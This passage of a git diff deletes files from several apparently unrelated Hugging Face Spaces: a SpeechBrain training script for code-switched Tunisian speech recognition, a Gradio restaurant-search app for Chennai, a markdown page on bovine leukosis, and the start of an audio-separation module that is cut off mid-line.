Falling back to torch.nn.functional.grid_sample().') - return False - -#---------------------------------------------------------------------------- - -class _GridSample2dForward(torch.autograd.Function): - @staticmethod - def forward(ctx, input, grid): - assert input.ndim == 4 - assert grid.ndim == 4 - output = torch.nn.functional.grid_sample(input=input, grid=grid, mode='bilinear', padding_mode='zeros', align_corners=False) - ctx.save_for_backward(input, grid) - return output - - @staticmethod - def backward(ctx, grad_output): - input, grid = ctx.saved_tensors - grad_input, grad_grid = _GridSample2dBackward.apply(grad_output, input, grid) - return grad_input, grad_grid - -#---------------------------------------------------------------------------- - -class _GridSample2dBackward(torch.autograd.Function): - @staticmethod - def forward(ctx, grad_output, input, grid): - op = torch._C._jit_get_operation('aten::grid_sampler_2d_backward') - grad_input, grad_grid = op(grad_output, input, grid, 0, 0, False) - ctx.save_for_backward(grid) - return grad_input, grad_grid - - @staticmethod - def backward(ctx, grad2_grad_input, grad2_grad_grid): - _ = grad2_grad_grid # unused - grid, = ctx.saved_tensors - grad2_grad_output = None - grad2_input = None - grad2_grid = None - - if ctx.needs_input_grad[0]: - grad2_grad_output = _GridSample2dForward.apply(grad2_grad_input, grid) - - assert not ctx.needs_input_grad[2] - return grad2_grad_output, grad2_input, grad2_grid - -#---------------------------------------------------------------------------- diff --git a/spaces/SMOOTHY1962/redstonehero-realisian_v40/README.md b/spaces/SMOOTHY1962/redstonehero-realisian_v40/README.md deleted file mode 100644 index 64f6652c299826a16f76ddb868d400c3d0795a70..0000000000000000000000000000000000000000 --- a/spaces/SMOOTHY1962/redstonehero-realisian_v40/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Redstonehero-realisian V40 -emoji: 🚀 -colorFrom: blue -colorTo: green -sdk: gradio -sdk_version: 3.32.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/SalahZa/Code-Switched-Tunisian-SpeechToText/train_mixer.py b/spaces/SalahZa/Code-Switched-Tunisian-SpeechToText/train_mixer.py deleted file mode 100644 index acac2a1e16daad18c2c182751872998cbe2c468b..0000000000000000000000000000000000000000 --- a/spaces/SalahZa/Code-Switched-Tunisian-SpeechToText/train_mixer.py +++ /dev/null @@ -1,698 +0,0 @@ -# -*- coding: utf-8 -*- - -import os -import sys -import torch -import logging -import speechbrain as sb -from speechbrain.utils.distributed import run_on_main -from hyperpyyaml import load_hyperpyyaml -from pathlib import Path -import torchaudio.transforms as T -from cv_train import ASRCV -import torchaudio -import numpy as np -import kenlm -from pyctcdecode import build_ctcdecoder -import re -from torch.nn.utils.rnn import pad_sequence -import torch.optim as optim -import torch.nn as nn - - -# Commented out IPython magic to ensure Python compatibility. 
-hparams_file, run_opts, overrides = sb.parse_arguments(["hparams/train_semi.yaml"]) - -# If distributed_launch=True then -# create ddp_group with the right communication protocol -sb.utils.distributed.ddp_init_group(run_opts) - -with open(hparams_file) as fin: - hparams = load_hyperpyyaml(fin, overrides) - -# Create experiment directory -sb.create_experiment_directory( - experiment_directory=hparams["output_folder"], - hyperparams_to_save=hparams_file, - overrides=overrides, -) -# Dataset prep (parsing Librispeech) - -def dataio_prepare(hparams): - """This function prepares the datasets to be used in the brain class. - It also defines the data processing pipeline through user-defined functions.""" - - # 1. Define datasets - data_folder = hparams["data_folder"] - - train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( - csv_path=hparams["train_csv"], replacements={"data_root": data_folder}, - ) - - if hparams["sorting"] == "ascending": - # we sort training data to speed up training and get better results. - train_data = train_data.filtered_sorted( - sort_key="duration", - key_max_value={"duration": hparams["avoid_if_longer_than"]}, - ) - # when sorting do not shuffle in dataloader ! otherwise is pointless - hparams["dataloader_options"]["shuffle"] = False - - elif hparams["sorting"] == "descending": - train_data = train_data.filtered_sorted( - sort_key="duration", - reverse=True, - key_max_value={"duration": hparams["avoid_if_longer_than"]}, - ) - # when sorting do not shuffle in dataloader ! otherwise is pointless - hparams["dataloader_options"]["shuffle"] = False - - elif hparams["sorting"] == "random": - pass - - else: - raise NotImplementedError( - "sorting must be random, ascending or descending" - ) - - valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( - csv_path=hparams["valid_csv"], replacements={"data_root": data_folder}, - ) - # We also sort the validation data so it is faster to validate - valid_data = valid_data.filtered_sorted(sort_key="duration") - test_datasets = {} - for csv_file in hparams["test_csv"]: - name = Path(csv_file).stem - test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( - csv_path=csv_file, replacements={"data_root": data_folder} - ) - test_datasets[name] = test_datasets[name].filtered_sorted( - sort_key="duration" - ) - - datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()] - - - # 2. Define audio pipeline: - @sb.utils.data_pipeline.takes("wav") - @sb.utils.data_pipeline.provides("sig") - def audio_pipeline(wav): - info = torchaudio.info(wav) - sig = sb.dataio.dataio.read_audio(wav) - if len(sig.shape)>1 : - sig = torch.mean(sig, dim=1) - resampled = torchaudio.transforms.Resample( - info.sample_rate, hparams["sample_rate"], - )(sig) - return resampled - - sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) - label_encoder = sb.dataio.encoder.CTCTextEncoder() - - # 3. 
Define text pipeline: - @sb.utils.data_pipeline.takes("wrd") - @sb.utils.data_pipeline.provides( - "wrd", "char_list", "tokens_list", "tokens" - ) - def text_pipeline(wrd): - yield wrd - char_list = list(wrd) - yield char_list - tokens_list = label_encoder.encode_sequence(char_list) - yield tokens_list - tokens = torch.LongTensor(tokens_list) - yield tokens - - sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) - lab_enc_file = os.path.join(hparams["save_folder"], "label_encoder.txt") - special_labels = { - "blank_label": hparams["blank_index"], - "unk_label": hparams["unk_index"] - } - label_encoder.load_or_create( - path=lab_enc_file, - from_didatasets=[train_data], - output_key="char_list", - special_labels=special_labels, - sequence_input=True, - ) - - # 4. Set output: - sb.dataio.dataset.set_output_keys( - datasets, ["id", "sig", "wrd", "char_list", "tokens"], - ) - return train_data, valid_data,test_datasets, label_encoder - -class ASR(sb.core.Brain): - def compute_forward(self, batch, stage): - """Forward computations from the waveform batches to the output probabilities.""" - - batch = batch.to(self.device) - wavs, wav_lens = batch.sig - wavs, wav_lens = wavs.to(self.device), wav_lens.to(self.device) - - if stage == sb.Stage.TRAIN: - if hasattr(self.hparams, "augmentation"): - wavs = self.hparams.augmentation(wavs, wav_lens) - - # Forward pass - feats = self.modules.wav2vec2(wavs, wav_lens) - x = self.modules.enc(feats) - logits = self.modules.ctc_lin(x) - p_ctc = self.hparams.log_softmax(logits) - - return p_ctc, wav_lens - - def custom_encode(self,wavs,wav_lens) : - wavs = wavs.to(self.device) - if(wav_lens is not None): wav_lens.to(self.device) - - feats = self.modules.wav2vec2(wavs, wav_lens) - x = self.modules.enc(feats) - logits = self.modules.ctc_lin(x) - p_ctc = self.hparams.log_softmax(logits) - - return feats,p_ctc - - - - def compute_objectives(self, predictions, batch, stage): - """Computes the loss (CTC) given predictions and targets.""" - - p_ctc, wav_lens = predictions - - ids = batch.id - tokens, tokens_lens = batch.tokens - - loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) - - if stage != sb.Stage.TRAIN: - predicted_tokens = sb.decoders.ctc_greedy_decode( - p_ctc, wav_lens, blank_id=self.hparams.blank_index - ) - # Decode token terms to words - if self.hparams.use_language_modelling: - predicted_words = [] - for logs in p_ctc: - text = decoder.decode(logs.detach().cpu().numpy()) - predicted_words.append(text.split(" ")) - else: - predicted_words = [ - "".join(self.tokenizer.decode_ndim(utt_seq)).split(" ") - for utt_seq in predicted_tokens - ] - # Convert indices to words - target_words = [wrd.split(" ") for wrd in batch.wrd] - - self.wer_metric.append(ids, predicted_words, target_words) - self.cer_metric.append(ids, predicted_words, target_words) - - return loss - - def fit_batch(self, batch): - """Train the parameters given a single batch in input""" - should_step = self.step % self.grad_accumulation_factor == 0 - # Managing automatic mixed precision - # TOFIX: CTC fine-tuning currently is unstable - # This is certainly due to CTC being done in fp16 instead of fp32 - if self.auto_mix_prec: - with torch.cuda.amp.autocast(): - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - with self.no_sync(not should_step): - self.scaler.scale( - loss / self.grad_accumulation_factor - ).backward() - if should_step: - - if not self.hparams.wav2vec2.freeze: - 
self.scaler.unscale_(self.wav2vec_optimizer) - self.scaler.unscale_(self.model_optimizer) - if self.check_gradients(loss): - if not self.hparams.wav2vec2.freeze: - if self.optimizer_step >= self.hparams.warmup_steps: - self.scaler.step(self.wav2vec_optimizer) - self.scaler.step(self.model_optimizer) - self.scaler.update() - self.zero_grad() - self.optimizer_step += 1 - else: - # This is mandatory because HF models have a weird behavior with DDP - # on the forward pass - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - - with self.no_sync(not should_step): - (loss / self.grad_accumulation_factor).backward() - if should_step: - if self.check_gradients(loss): - if not self.hparams.wav2vec2.freeze: - if self.optimizer_step >= self.hparams.warmup_steps: - self.wav2vec_optimizer.step() - self.model_optimizer.step() - self.zero_grad() - self.optimizer_step += 1 - - self.on_fit_batch_end(batch, outputs, loss, should_step) - return loss.detach().cpu() - - def evaluate_batch(self, batch, stage): - """Computations needed for validation/test batches""" - predictions = self.compute_forward(batch, stage=stage) - with torch.no_grad(): - loss = self.compute_objectives(predictions, batch, stage=stage) - return loss.detach() - - def on_stage_start(self, stage, epoch): - """Gets called at the beginning of each epoch""" - if stage != sb.Stage.TRAIN: - self.cer_metric = self.hparams.cer_computer() - self.wer_metric = self.hparams.error_rate_computer() - - def on_stage_end(self, stage, stage_loss, epoch): - """Gets called at the end of an epoch.""" - # Compute/store important stats - stage_stats = {"loss": stage_loss} - if stage == sb.Stage.TRAIN: - self.train_stats = stage_stats - else: - stage_stats["CER"] = self.cer_metric.summarize("error_rate") - stage_stats["WER"] = self.wer_metric.summarize("error_rate") - - # Perform end-of-iteration things, like annealing, logging, etc. 
- if stage == sb.Stage.VALID: - old_lr_model, new_lr_model = self.hparams.lr_annealing_model( - stage_stats["loss"] - ) - old_lr_wav2vec, new_lr_wav2vec = self.hparams.lr_annealing_wav2vec( - stage_stats["loss"] - ) - sb.nnet.schedulers.update_learning_rate( - self.model_optimizer, new_lr_model - ) - if not self.hparams.wav2vec2.freeze: - sb.nnet.schedulers.update_learning_rate( - self.wav2vec_optimizer, new_lr_wav2vec - ) - self.hparams.train_logger.log_stats( - stats_meta={ - "epoch": epoch, - "lr_model": old_lr_model, - "lr_wav2vec": old_lr_wav2vec, - }, - train_stats=self.train_stats, - valid_stats=stage_stats, - ) - self.checkpointer.save_and_keep_only( - meta={"WER": stage_stats["WER"]}, min_keys=["WER"], - ) - elif stage == sb.Stage.TEST: - self.hparams.train_logger.log_stats( - stats_meta={"Epoch loaded": self.hparams.epoch_counter.current}, - test_stats=stage_stats, - ) - with open(self.hparams.wer_file, "w") as w: - self.wer_metric.write_stats(w) - - def init_optimizers(self): - "Initializes the wav2vec2 optimizer and model optimizer" - - # If the wav2vec encoder is unfrozen, we create the optimizer - if not self.hparams.wav2vec2.freeze: - self.wav2vec_optimizer = self.hparams.wav2vec_opt_class( - self.modules.wav2vec2.parameters() - ) - if self.checkpointer is not None: - self.checkpointer.add_recoverable( - "wav2vec_opt", self.wav2vec_optimizer - ) - - self.model_optimizer = self.hparams.model_opt_class( - self.hparams.model.parameters() - ) - - if self.checkpointer is not None: - self.checkpointer.add_recoverable("modelopt", self.model_optimizer) - - def zero_grad(self, set_to_none=False): - if not self.hparams.wav2vec2.freeze: - self.wav2vec_optimizer.zero_grad(set_to_none) - self.model_optimizer.zero_grad(set_to_none) - - -from speechbrain.pretrained import EncoderASR,EncoderDecoderASR -french_asr_model = EncoderASR.from_hparams(source="speechbrain/asr-wav2vec2-commonvoice-fr", savedir="pretrained_models/asr-wav2vec2-commonvoice-fr").cuda() - -cvhparams_file, cvrun_opts, cvoverrides = sb.parse_arguments(["en_cv.yaml"]) -with open(cvhparams_file) as cvfin: - cvhparams = load_hyperpyyaml(cvfin, cvoverrides) -english_asr_model = ASRCV( - modules=cvhparams["modules"], - hparams=cvhparams, - run_opts=cvrun_opts, - checkpointer=cvhparams["checkpointer"], - ) -english_asr_model.checkpointer.recover_if_possible() -asr_brain = ASR( - modules=hparams["modules"], - hparams=hparams, - run_opts=run_opts, - checkpointer=hparams["checkpointer"], -) -asr_brain.checkpointer.recover_if_possible() -asr_brain.modules.eval() -english_asr_model.modules.eval() -french_asr_model.mods.eval() - -# Commented out IPython magic to ensure Python compatibility. 
-# %ls - -#UTILS FUNCTIOJNS -def get_size_dimensions(arr): - size_dimensions = [] - while isinstance(arr, list): - size_dimensions.append(len(arr)) - arr = arr[0] - return size_dimensions - -def scale_array(batch,n): - scaled_batch = [] - - for array in batch: - if(n < len(array)): raise ValueError("Cannot scale Array down") - - repeat = round(n/len(array))+1 - scaled_length_array= [] - - for i in array: - for j in range(repeat) : - if(len(scaled_length_array) == n): break - scaled_length_array.append(i) - - scaled_batch.append(scaled_length_array) - - return torch.tensor(scaled_batch) - - -def load_paths(wavs_path): - waveforms = [] - for path in wavs_path : - waveform, _ = torchaudio.load(path) - waveforms.append(waveform.squeeze(0)) - # normalize array length to the bigger arrays by pading with 0's - padded_arrays = pad_sequence(waveforms, batch_first=True) - return torch.tensor(padded_arrays) - - - -device = 'cuda' -verbose = 0 -#FLOW LEVEL FUNCTIONS -def merge_strategy(embeddings1, embeddings2, embeddings3,post1, post2,post3): - - - post1 = post1.to(device) - post2 = post2.to(device) - post3 = post3.to(device) - embeddings1 = embeddings1.to(device) - embeddings2 = embeddings2.to(device) - embeddings3 = embeddings3.to(device) - - posteriograms_merged = torch.cat((post1,post2,post3),dim=2) - embeddings_merged = torch.cat((embeddings1,embeddings2,embeddings3),dim=2) - - if(verbose !=0): - print('MERGED POST ',posteriograms_merged.shape) - print('MERGED emb ',embeddings_merged.shape) - - return torch.cat((posteriograms_merged,embeddings_merged),dim=2).to(device) - -def decode(model,wavs,wav_lens): - - with torch.no_grad(): - wav_lens = wav_lens.to(model.device) - encoder_out = model.encode_batch(wavs, wav_lens) - predictions = model.decoding_function(encoder_out, wav_lens) - return predictions - -def middle_layer(batch, lens): - - tn_embeddings, tn_posteriogram = asr_brain.custom_encode(batch,None) - - fr_embeddings = french_asr_model.mods.encoder.wav2vec2(batch) - fr_posteriogram =french_asr_model.encode_batch(batch,lens) - en_embeddings = english_asr_model.modules.wav2vec2(batch, lens) - x = english_asr_model.modules.enc(en_embeddings) - en_posteriogram = english_asr_model.modules.ctc_lin(x) - #scores, en_posteriogram = english_asr_model.mods.decoder(en_embeddings ,lens) - if(verbose !=0): - print('[EMBEDDINGS] FR:',fr_embeddings.shape, "EN:",en_embeddings.shape, "TN:", tn_embeddings.shape) - print('[POSTERIOGRAM] FR:',fr_posteriogram.shape, "EN:",en_posteriogram.shape,"TN:",tn_posteriogram.shape) - - - bilangual_sample = merge_strategy(fr_embeddings,en_embeddings,tn_embeddings,fr_posteriogram,en_posteriogram,tn_posteriogram) - return bilangual_sample - -class Mixer(sb.core.Brain): - - def compute_forward(self, batch, stage): - """Forward computations from the waveform batches to the output probabilities.""" - wavs, wav_lens = batch.sig - wavs, wav_lens = wavs.to(self.device), wav_lens.to(self.device) - - if stage == sb.Stage.TRAIN: - if hasattr(self.hparams, "augmentation"): - wavs = self.hparams.augmentation(wavs, wav_lens) - - multi_langual_feats = middle_layer(wavs, wav_lens) - multi_langual_feats= multi_langual_feats.to(device) - feats, _ = self.modules.enc(multi_langual_feats) - logits = self.modules.ctc_lin(feats) - p_ctc = self.hparams.log_softmax(logits) - - if stage!= sb.Stage.TRAIN: - p_tokens = sb.decoders.ctc_greedy_decode( - p_ctc, wav_lens, blank_id=self.hparams.blank_index - ) - else : - p_tokens = None - return p_ctc, wav_lens, p_tokens - - def compute_objectives(self, 
predictions, batch, stage): - """Computes the loss (CTC) given predictions and targets.""" - - p_ctc, wav_lens , predicted_tokens= predictions - - ids = batch.id - tokens, tokens_lens = batch.tokens - - loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) - - - if stage == sb.Stage.VALID: - predicted_words = [ - "".join(self.tokenizer.decode_ndim(utt_seq)).split(" ") - for utt_seq in predicted_tokens - ] - target_words = [wrd.split(" ") for wrd in batch.wrd] - self.wer_metric.append(ids, predicted_words, target_words) - self.cer_metric.append(ids, predicted_words, target_words) - if stage ==sb.Stage.TEST : - if self.hparams.language_modelling: - predicted_words = [] - for logs in p_ctc: - text = decoder.decode(logs.detach().cpu().numpy()) - predicted_words.append(text.split(" ")) - else : - predicted_words = [ - "".join(self.tokenizer.decode_ndim(utt_seq)).split(" ") - for utt_seq in predicted_tokens - ] - - target_words = [wrd.split(" ") for wrd in batch.wrd] - self.wer_metric.append(ids, predicted_words, target_words) - self.cer_metric.append(ids, predicted_words, target_words) - - return loss - - def fit_batch(self, batch): - """Train the parameters given a single batch in input""" - should_step = self.step % self.grad_accumulation_factor == 0 - # Managing automatic mixed precision - # TOFIX: CTC fine-tuning currently is unstable - # This is certainly due to CTC being done in fp16 instead of fp32 - if self.auto_mix_prec: - with torch.cuda.amp.autocast(): - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - with self.no_sync(not should_step): - self.scaler.scale( - loss / self.grad_accumulation_factor - ).backward() - if should_step: - - - self.scaler.unscale_(self.model_optimizer) - if self.check_gradients(loss): - self.scaler.step(self.model_optimizer) - self.scaler.update() - self.zero_grad() - self.optimizer_step += 1 - else: - # This is mandatory because HF models have a weird behavior with DDP - # on the forward pass - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - - with self.no_sync(not should_step): - (loss / self.grad_accumulation_factor).backward() - if should_step: - if self.check_gradients(loss): - self.model_optimizer.step() - self.zero_grad() - self.optimizer_step += 1 - - self.on_fit_batch_end(batch, outputs, loss, should_step) - return loss.detach().cpu() - - def evaluate_batch(self, batch, stage): - """Computations needed for validation/test batches""" - predictions = self.compute_forward(batch, stage=stage) - with torch.no_grad(): - loss = self.compute_objectives(predictions, batch, stage=stage) - return loss.detach() - - def on_stage_start(self, stage, epoch): - """Gets called at the beginning of each epoch""" - if stage != sb.Stage.TRAIN: - self.cer_metric = self.hparams.cer_computer() - self.wer_metric = self.hparams.error_rate_computer() - - def on_stage_end(self, stage, stage_loss, epoch): - """Gets called at the end of an epoch.""" - # Compute/store important stats - stage_stats = {"loss": stage_loss} - if stage == sb.Stage.TRAIN: - self.train_stats = stage_stats - else: - stage_stats["CER"] = self.cer_metric.summarize("error_rate") - stage_stats["WER"] = self.wer_metric.summarize("error_rate") - - # Perform end-of-iteration things, like annealing, logging, etc. 
- if stage == sb.Stage.VALID: - old_lr_model, new_lr_model = self.hparams.lr_annealing_model( - stage_stats["loss"] - ) - sb.nnet.schedulers.update_learning_rate( - self.model_optimizer, new_lr_model - ) - self.hparams.train_logger.log_stats( - stats_meta={ - "epoch": epoch, - "lr_model": old_lr_model, - }, - train_stats=self.train_stats, - valid_stats=stage_stats, - ) - self.checkpointer.save_and_keep_only( - meta={"WER": stage_stats["WER"]}, min_keys=["WER"], - ) - elif stage == sb.Stage.TEST: - self.hparams.train_logger.log_stats( - stats_meta={"Epoch loaded": self.hparams.epoch_counter.current}, - test_stats=stage_stats, - ) - with open(self.hparams.wer_file, "w") as w: - self.wer_metric.write_stats(w) - - def init_optimizers(self): - - self.model_optimizer = self.hparams.model_opt_class( - self.hparams.model.parameters() - ) - - if self.checkpointer is not None: - self.checkpointer.add_recoverable("modelopt", self.model_optimizer) - - def zero_grad(self, set_to_none=False): - - self.model_optimizer.zero_grad(set_to_none) - - -hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) - -# If distributed_launch=True then -# create ddp_group with the right communication protocol -sb.utils.distributed.ddp_init_group(run_opts) - -with open(hparams_file) as fin: - hparams = load_hyperpyyaml(fin, overrides) - -# Create experiment directory -sb.create_experiment_directory( - experiment_directory=hparams["output_folder"], - hyperparams_to_save=hparams_file, - overrides=overrides, -) -def read_labels_file(labels_file): - with open(labels_file, "r",encoding="utf-8") as lf: - lines = lf.read().splitlines() - division = "===" - numbers = {} - for line in lines : - if division in line : - break - string, number = line.split("=>") - number = int(number) - string = string[1:-2] - numbers[number] = string - return [numbers[x] for x in range(len(numbers))] -train_data, valid_data, test_datasets, label_encoder = dataio_prepare( - hparams - ) - - -labels = read_labels_file(os.path.join(hparams["save_folder"], "label_encoder.txt")) -labels = [""] + labels[1:-1] + ["1"] -if hparams["language_modelling"]: - decoder = build_ctcdecoder( - labels, - kenlm_model_path=hparams["ngram_lm_path"], # either .arpa or .bin file - alpha=0.5, # tuned on a val set - beta=1, # tuned on a val set - ) - - - - -mixer = Mixer( - modules=hparams["modules"], - hparams=hparams, - run_opts=run_opts, - checkpointer=hparams["checkpointer"], -) -mixer.tokenizer = label_encoder - - -mixer.fit( - mixer.hparams.epoch_counter, - train_data, - valid_data, - train_loader_kwargs=hparams["dataloader_options"], - valid_loader_kwargs=hparams["test_dataloader_options"], -) -print(test_datasets.keys()) -for k in test_datasets.keys(): # keys are test_clean, test_other etc - mixer.hparams.wer_file = os.path.join( - hparams["output_folder"], "wer_{}.txt".format(k) - ) - mixer.evaluate( - test_datasets[k], test_loader_kwargs=hparams["test_dataloader_options"] - ) - diff --git a/spaces/Sardor-Odil/StableDiffusion/app.py b/spaces/Sardor-Odil/StableDiffusion/app.py deleted file mode 100644 index 155c781153e7732740eafd5360d20dfa4f5c3421..0000000000000000000000000000000000000000 --- a/spaces/Sardor-Odil/StableDiffusion/app.py +++ /dev/null @@ -1,83 +0,0 @@ -import gradio as gr -import pandas as pd -import numpy as np - -import warnings - -warnings.filterwarnings('ignore') - -url = 'https://raw.githubusercontent.com/ArushiS12/gradio-heroku/main/Zomato-Chennai.csv' -data = pd.read_csv(url) - - -def cuisine(Cuisine, Area): - l = [Cuisine] - x = 
data['Cuisine'].str.contains('|'.join(l)) - data['Flag'] = np.where(x, 'Yes', 'No') - df = data.loc[data['Flag'] == 'Yes'] - if Area: - df1 = df[df['Area'] == Area] - final1 = df1.drop('Flag', axis=1) - return final1 - else: - final = df.drop('Flag', axis=1) - return final - - -cuisine_options = ['American', 'Andhra', 'Arabian', 'Asian', 'Bakery', 'Bar Food', 'BBQ', 'Beverages', 'Biryani', - 'Bubble Tea', 'Burger', 'Burmese', 'Cafe', 'Charcoal Chicken', 'Chettinad', 'Chinese', 'Coffee', - 'Continental', 'Desserts', 'Drinks Only', 'European', 'Fast Food', 'Finger Food', 'French', - 'Gujarati', 'Healthy Food', 'Hyderabadi', 'Ice Cream', 'Irish', 'Italian', 'Japanese', 'Juices', - 'Kebab', 'Kerala', 'Konkan', 'Korean', 'Lebanese', 'Malaysian', 'Mangalorean', 'Mediterranean', - 'Mexican', 'Middle Eastern', 'Mithai', 'Modern Indian', 'Momos', 'Mughlai', 'North Indian', - 'Oriental', 'Pancake', 'Pasta', 'Pizza', 'Rajasthani', 'Rolls', 'Salad', 'Sandwich', 'Seafood', - 'Shake', 'Sichuan', 'Singaporean', 'South Indian', 'Spanish', 'Steak', 'Street Food', 'Sushi', - 'Tamil', 'Tea', 'Tex-Mex', 'Thai', 'Tibetan', 'Turkish', 'Vietnamese', 'Waffle', 'Wraps'] -area_options = ['Abhiramapuram', 'Adyar', 'Akkarai', 'Alandur', 'Alwarpet', 'Ambattur', - 'Ampa Skywalk Mall Aminijikarai', 'Anna Nagar East', 'Anna Nagar West', 'Anna Salai', 'Arumbakkam', - 'Ashok Nagar', 'Avadi', 'Besant Nagar', 'Chetpet', 'Choolaimed', 'Chromepet', 'Citadines', - 'Courtyard by Marriott Teynampet', 'Crowne Plaza Adyar Park Alwarpet', 'E Hotel Royapettah', 'Egatoor', - 'Egmore', 'Ekkaduthangal', 'Feathers A Radha Hotel', 'Foodies Kitchen', 'Forum Vijaya Mall Vadapalani', - 'George Town', 'Gopalapuram', 'Grand by GRT Hotels', 'Green Park Hotel Vadapalani', 'GST Road', - 'Guindy', 'Hablis Hotel Guindy', 'Hilton Guindy', 'Holiday Inn OMR IT Expressway', - 'Hotel Abu Palace Egmore', 'Hotel Maris Gopalapuram', 'Hotel Palmgrove Nungambakkam', - 'Hotel Park Elanza Nungambakkam', 'Hotel Rajpark Alwarpet', 'Hyatt Regency Teynampet', 'IBIS OMR', - 'Injambakkam', 'Ispahani Centre Nungambakkam', - 'InterContinental Mahabalipuram Resort East Coast Road (ECR)', 'ITC Grand Chola Guindy', - 'Jaag Hotels T.Nagar', 'K.K. Nagar', 'Kanathur', 'Karapakkam', 'Kilpauk', - 'Kipling East Coast Road (ECR)', 'Kodambakkam', 'Kolathur', 'Kotturpuram', 'Kovalam', - 'Lemon Tree Hotel Guindy', 'Madipakkam', 'Maduravoyal', 'Mahabalipuram', 'Mandaveli', 'Medavakkam', - 'Meenambakkam', 'Mogappair', 'MRC Nagar', 'Muttukadu', 'Mylapore', 'Nandanam', 'Navallur', - 'Neelangarai', 'New Woodlands Hotel Mylapore', 'Novotel Nandanam', 'Novotel OMR', 'Nungambakkam', - 'Okkiyampet', 'Old Mahabalipuram Road (OMR)', 'OMR Food Street Kandanchavadi', 'Paati Veedu T.Nagar', - 'Palavakkam', 'Pallikaranai', 'Perambur', 'Perungudi', 'Phoenix Market City Velachery', 'Poonamalle', - 'Porur', 'Potheri', 'Purasavakkam', 'RA Puram', 'Radisson Blu Egmore', - 'Radisson Blu Temple Bay Mamallapuram', 'Ramada Plaza Guindy', 'Ramapuram', 'Royapettah', 'Saidapet', - 'Saligramam', 'Selaiyur', 'Semmancheri', 'Sheraton Grand Neelangarai', 'Sholinganallur', - 'Somerset Greenways', 'St. Thomas Mount', 'T. Nagar', 'Taj Club House Thousand Lights', - 'Taj Coromandel Nungambakkam', "Taj Fisherman's Cove Resort & Spa Kanchipuram District", 'Tambaram', - 'Taramani', 'Teynampet', 'The Accord Metropolitan T. Nagar', "The King's Hotel Egmore", - 'The Leela Palace MRC Nagar', 'The Park Nungambakkam', 'The Raintree Alwarpet', - 'The Residency T. Nagar', 'The Residency Towers T. 
Nagar', 'The Savara Hotel RK Salai (Cathedral Road)', - 'The Westin Velachery', 'Thiruvanmiyur', 'Thousand Lights', 'Thuraipakkam', 'Tiruvottiyur', - 'Triplicane', 'Turyaa', 'Vadapalani', 'Valasaravakkam', 'Velachery', 'Vepery', 'Virugambakkam', - 'VR Mall Anna Nagar', 'Washermenpet', 'West Mambalam', 'Zone by The Park Pallikaranai'] - -with gr.Blocks() as demo: - gr.Markdown("
      Dine-out Restaurants in Chennai
      ") - gr.Markdown('
      Search for your nearby restaurants.
      ') - - with gr.Row(): - name = gr.Dropdown(cuisine_options, label="Cuisine") - name1 = gr.Dropdown(area_options, label="Location") - - with gr.Row(): - submit_btn = gr.Button("Submit") - clear_btn = gr.Button("Clear") - - output = gr.DataFrame(label="Restaurants", wrap=True) - - submit_btn.click(fn=cuisine, inputs=[name, name1], outputs=output) - clear_btn.click(None, inputs=[], outputs=output, _js="() => (null)\n") - -demo.launch() \ No newline at end of file diff --git a/spaces/SarthakSidhant/Go-Cattle/diseases/enzootic bovine leukosis.md b/spaces/SarthakSidhant/Go-Cattle/diseases/enzootic bovine leukosis.md deleted file mode 100644 index f51149945818f17cf4e05fc4dd477aa9ee831899..0000000000000000000000000000000000000000 --- a/spaces/SarthakSidhant/Go-Cattle/diseases/enzootic bovine leukosis.md +++ /dev/null @@ -1,37 +0,0 @@ -## Enzootic bovine leukosis (EBL) - -**Information** - -Enzootic bovine leukosis (EBL) is a chronic, contagious disease of cattle caused by a retrovirus called bovine leukaemia virus (BLV). BLV is a cancer-causing virus that can infect cattle of all ages. - -**Symptoms** - -The symptoms of EBL can vary depending on the animal's individual immune response. Some infected cattle may show no symptoms at all, while others may develop a range of symptoms, including: - -* Weight loss -* Enlarged lymph nodes -* Anemia -* Jaundice -* Reduced milk production -* Cancerous tumors - -**Remedies** - -There is no cure for EBL. Treatment is usually supportive and may include: - -* Administering fluids and electrolytes -* Treating secondary bacterial infections -* Administering antibiotics - -**Causes** - -EBL is caused by a retrovirus called bovine leukaemia virus (BLV). BLV is a cancer-causing virus that can infect cattle of all ages. BLV is spread through contact with infected cattle's blood or milk. - -**Prevention** - -There is no vaccine available for EBL. 
However, there are some preventive measures that can be taken to reduce the risk of infection, such as: - -* Testing cattle for BLV infection -* Isolating infected animals from healthy animals -* Practicing good hygiene and biosecurity measures -* Vaccinating cattle against other diseases that can weaken the immune system, such as bovine viral diarrhea virus (BVDV) and rotavirus diff --git a/spaces/ServerX/PorcoDiaz/infer/modules/uvr5/modules.py b/spaces/ServerX/PorcoDiaz/infer/modules/uvr5/modules.py deleted file mode 100644 index f63ac6a794100cc95da21dcba78b23377a1f133d..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/infer/modules/uvr5/modules.py +++ /dev/null @@ -1,107 +0,0 @@ -import os -import traceback -import logging - -logger = logging.getLogger(__name__) - -import ffmpeg -import torch - -from configs.config import Config -from infer.modules.uvr5.mdxnet import MDXNetDereverb -from infer.modules.uvr5.preprocess import AudioPre, AudioPreDeEcho - -config = Config() - - -def uvr(model_name, inp_root, save_root_vocal, paths, save_root_ins, agg, format0): - infos = [] - try: - inp_root = inp_root.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - save_root_vocal = ( - save_root_vocal.strip(" 